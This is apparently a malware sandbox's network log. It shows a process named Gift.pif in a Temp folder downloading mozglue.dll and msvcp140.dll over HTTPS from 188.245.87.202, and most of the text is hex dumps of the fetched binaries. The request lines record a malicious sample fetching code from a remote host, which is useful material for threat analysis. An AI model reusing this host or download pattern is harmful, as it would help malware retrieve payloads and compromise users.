                                                                        2024-08-05 16:56:07 UTC16384INData Raw: 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0
                                                                        Data Ascii: eUeLXee0@eeeue0UEeeUeee $
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8
                                                                        Data Ascii: O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE
                                                                        2024-08-05 16:56:07 UTC16384INData Raw: ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5
                                                                        Data Ascii: ,0<48%8A)$


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.549725188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:09 UTC244OUTGET /mozglue.dll HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:09 UTC260INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:09 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 608080
                                                                        Connection: close
                                                                        Last-Modified: Monday, 05-Aug-2024 16:56:09 GMT
                                                                        Cache-Control: no-store, no-cache
                                                                        Accept-Ranges: bytes
                                                                        2024-08-05 16:56:09 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46
                                                                        Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPF
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff
                                                                        Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85
                                                                        Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b
                                                                        Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc
                                                                        Data Ascii: H) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9
                                                                        Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89
                                                                        Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83
                                                                        Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0
                                                                        Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.549726188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:11 UTC245OUTGET /msvcp140.dll HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:11 UTC260INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:11 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 450024
                                                                        Connection: close
                                                                        Last-Modified: Monday, 05-Aug-2024 16:56:11 GMT
                                                                        Cache-Control: no-store, no-cache
                                                                        Accept-Ranges: bytes
                                                                        2024-08-05 16:56:11 UTC16124INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                        2024-08-05 16:56:11 UTC16384INData Raw: 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72
                                                                        Data Ascii: -bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr
                                                                        2024-08-05 16:56:11 UTC16384INData Raw: 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff
                                                                        Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                        2024-08-05 16:56:11 UTC16384INData Raw: 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd
                                                                        Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                        2024-08-05 16:56:11 UTC16384INData Raw: 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0
                                                                        Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                        2024-08-05 16:56:11 UTC16384INData Raw: 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57
                                                                        Data Ascii: AUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSW
                                                                        2024-08-05 16:56:11 UTC16384INData Raw: 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8
                                                                        Data Ascii: E_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ
